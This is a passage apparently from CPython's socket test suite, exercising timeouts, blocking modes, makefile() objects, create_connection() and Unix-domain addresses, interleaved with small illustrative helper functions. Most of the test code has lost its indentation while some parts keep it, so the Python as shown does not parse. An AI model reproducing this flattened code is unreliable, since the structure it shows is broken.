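        raise ZeroDivisionError  # any exception stops the retry loop
    old_handler = signal.signal(signal.SIGALRM, handler)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(4.0)
    try:
        signal.setitimer(signal.ITIMER_REAL, 0.05)
        try:
            sock.recv(1024)  # blocks until the alarm fires
        except ZeroDivisionError:
            return True  # the handler's exception propagated here
        return False
    finally:
        signal.setitimer(signal.ITIMER_REAL, 0)
        signal.signal(signal.SIGALRM, old_handler)
        sock.close()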
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# ZeroDivisionError when interrupted by a signal (the SIGALRM
# handler divides by zero).
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Test that setblocking() works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(None)
self.assertTrue(self.serv.getblocking())
if fcntl:
self.assertTrue(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(10)
self.assertTrue(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 10)
if fcntl:
# When a Python socket has a non-zero timeout, it's
# switched internally to a non-blocking mode.
# Later, sock.sendall(), sock.recv(), and other socket
# operations use a `select()` call and handle EWOULDBLOCK/EAGAIN
# on all socket operations. That's how timeouts are
# enforced.
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
self.serv.settimeout(0)
self.assertFalse(self.serv.getblocking())
if fcntl:
self.assertFalse(_is_fd_in_blocking_mode(self.serv))
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.assertFalse(self.serv.getblocking())
self.assertEqual(self.serv.gettimeout(), 0)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
# the client hasn't called connect() yet: non-blocking accept() fails
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
self.event.set()
read, write, err = select.select([self.serv], [], [], MAIN_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(0)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], MAIN_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server has sent data by now: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
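# Illustrative sketch (defined for reference, never called by the
# tests): the blocking/timeout equivalences that testSetBlocking()
# above walks through.
def _example_blocking_modes():
    import socket
    with socket.socket() as s:
        s.setblocking(False)  # equivalent to s.settimeout(0)
        assert s.gettimeout() == 0.0 and not s.getblocking()
        s.settimeout(None)  # equivalent to s.setblocking(True)
        assert s.gettimeout() is None and s.getblocking()
        s.settimeout(10)  # "blocking" to Python; the fd is non-blocking
        assert s.getblocking()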
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding=self.encoding,
errors=self.errors,
newline=self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding=self.encoding,
errors=self.errors,
newline=self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
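# Illustrative sketch (defined for reference, never called by the
# tests): the makefile() round trip exercised above, shown end to end
# on a local socket pair.  Assumes socket.socketpair() is available
# (POSIX, and Windows since Python 3.5).
def _example_makefile_roundtrip():
    import socket
    a, b = socket.socketpair()
    with a, b, a.makefile("wb") as wf, b.makefile("rb") as rf:
        wf.write(b"hello\n")
        wf.flush()  # push buffered bytes onto the socket
        return rf.readline()  # b"hello\n"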
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPv6 address being returned
# as well as an IPv4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully connect to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = support.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, socket.AF_INET)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
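# Illustrative sketch (defined for reference, never called by the
# tests): the create_connection() keyword arguments probed above, in a
# single call.  The host and port are placeholders; the function is
# not executed anywhere.
def _example_create_connection():
    import socket
    # timeout applies to the connect attempt and then becomes the new
    # socket's timeout; source_address forces a local bind() first.
    return socket.create_connection(("example.com", 80), timeout=30,
                                    source_address=("", 0))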
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signum, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
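# Illustrative sketch (defined for reference, never called by the
# tests): Linux abstract-namespace addresses start with a NUL byte and
# never touch the filesystem.  Linux-only.
def _example_abstract_bind():
    import socket
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.bind(b"\x00example-abstract-name")  # no file is created
        return s.getsockname()  # b"\x00example-abstract-name"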
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
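# Illustrative sketch (defined for reference, never called by the
# tests): the surrogateescape round trip used by
# testSurrogateescapeBind() above.  Assumes an ASCII-compatible
# filesystem encoding; the path is a placeholder.
def _example_unix_path_forms():
    import os
    raw = b"/tmp/example.sock"  # placeholder path
    # Decoding with surrogateescape and re-encoding with os.fsencode()
    # recovers the original bytes.
    as_str = raw.decode("ascii", "surrogateescape")
    assert os.fsencode(as_str) == raw
    return as_str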
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
